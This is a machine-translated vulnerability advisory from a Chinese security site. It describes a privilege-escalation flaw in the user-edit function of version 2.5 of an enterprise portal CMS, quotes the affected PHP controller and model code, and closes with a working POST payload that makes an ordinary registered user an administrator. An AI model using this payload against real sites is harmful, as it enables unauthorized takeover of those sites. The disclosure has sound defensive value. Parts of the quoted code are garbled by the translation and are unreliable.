Cicada-known Enterprise Portal system v2. 5 sql injection to admin-vulnerability warning-the black bar safety net

2014-10-03T00:00:00
ID MYHACK58:62201454275
Type myhack58
Reporter 佚名
Modified 2014-10-03T00:00:00

Description

The problem is when the user modifies the information of the place

/system/module/user/control.php

public function edit($account = ")

{

if(!$ account or RUN_MODE == 'front') $account = $this->app->user->account;

if($this->app->user->account == 'guest') $this->locate(inlink('login'));

if(! empty($_POST))

{

$this->user->update($account);

Follow-updata

/system/module/user/model.php

public function update($account)

{

/ If the user want to change his password. /

if($this->post->password1 != false)

{

$this->checkPassword();

if(dao::isError()) return false;

$password = $this->createPassword($this->post->password1, $account);

$this->post->set('password', $password);

}

$user = fixer::input('post')

->cleanInt('imobile, qq, zipcode')

->setDefault('admin', 'no')

->remove('ip, account, join, visits')

->removeIF(RUN_MODE != 'admin', 'admin')

->get();

return $this->the dao->update(TABLE_USER)

->data($user, $skip = 'password1,password2')

->autoCheck()

->batchCheck($this->config->user->require->edit, 'notempty')

->check('email', 'email')

->check('email', 'unique', "account!='$ account'")

->checkIF($this->post->gtalk != false, 'gtalk', 'email')

->where('account')->eq($account)

->exec();

}

fixer this class of code is a bit long it is not posted, see above code can also probably understand it the role of..

Ordinary users and administrators is in one table, the difference is that the admin field.

In short we post the data to do a foreach and then into the updata

Of course he has to remove the admin, but this is too good to bypass.

Directly see the use of it~

Registered users after came to

http://localhost/user-edit.html 修改 资料

The modified package

post the following data

realname=aaaaaa&email=a%40qqqq. com&password1=&password2=&company=&address=&zipcode=&mobile=&phone=&qq%3D1,admin=super&gtalk=

You can elevate to become administrators.